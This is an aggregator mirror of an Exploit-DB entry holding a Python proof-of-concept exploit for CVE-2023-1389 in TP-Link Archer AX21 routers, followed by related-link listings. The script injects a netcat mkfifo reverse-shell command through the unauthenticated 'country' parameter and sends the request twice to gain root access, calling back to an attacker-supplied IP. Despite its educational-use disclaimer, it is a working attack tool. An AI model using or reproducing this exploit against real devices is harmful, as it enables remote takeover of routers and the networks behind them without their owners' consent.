

[remote] TP-Link Archer AX21 - Unauthenticated Command Injection
source link: https://www.exploit-db.com/exploits/51677
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

#!/usr/bin/python3
#
# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
# Date: 07/25/2023
# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)
# Vendor Homepage: https://www.tp-link.com/us/
# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)
# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
# CVE: CVE-2023-1389
#
# Disclaimer: This script is intended to be used for educational purposes only.
# Do not run this against any system that you do not have permission to test.
# The author will not be held responsible for any use or damage caused by this
# program.
#
# CVE-2023-1389 is an unauthenticated command injection vulnerability in the web
# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the
# *country* parameter of the *write* callback for the *country* form at the
# "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is
# possible to run commands as root. Execution requires sending the request twice;
# the first request sets the command in the *country* value, and the second request
# (which can be identical or not) executes it.
#
# This script is a short proof of concept to obtain a reverse shell. To read more
# about the development of this script, you can read the blog post here:
# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
# Before running the script, start a nc listener on your preferred port -> run the script -> profit
import requests, urllib.parse, argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Suppress warning for connecting to a router with a self-signed certificate
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Take user input for the router IP, and attacker IP and port
parser = argparse.ArgumentParser()
parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")
parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")
args = parser.parse_args()
# Generate the reverse shell command with the attacker IP and port
revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")
# URL to obtain the reverse shell
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"
# Send the URL twice to run the command. Sending twice is necessary for the attack
r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)
Recommend
-
4
TP-Link is going straight to Wi-Fi 7 with its latest generation of routers / The company’s latest collection of routers includes the newly designed Archer BE900 quad-band router for $700 and an upcoming GE800 gaming r...
-
5
Archer, United announce air taxi link between Chicago and O’Hare ...
-
8
Human Resource Management System 1.0 - SQL Injection (unauthenticated)...
-
9
Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)...
-
7
Intern Record System v1.0 - SQL Injection (Unauthenticated)
-
8
Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)...
-
14
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection ...
-
10
Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)...
-
6
TP-Link’s AX21 Wi-Fi 6 router gives your network a 2023 upgrade at new low of $65 (Reg. $75+) ...
-
11
WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK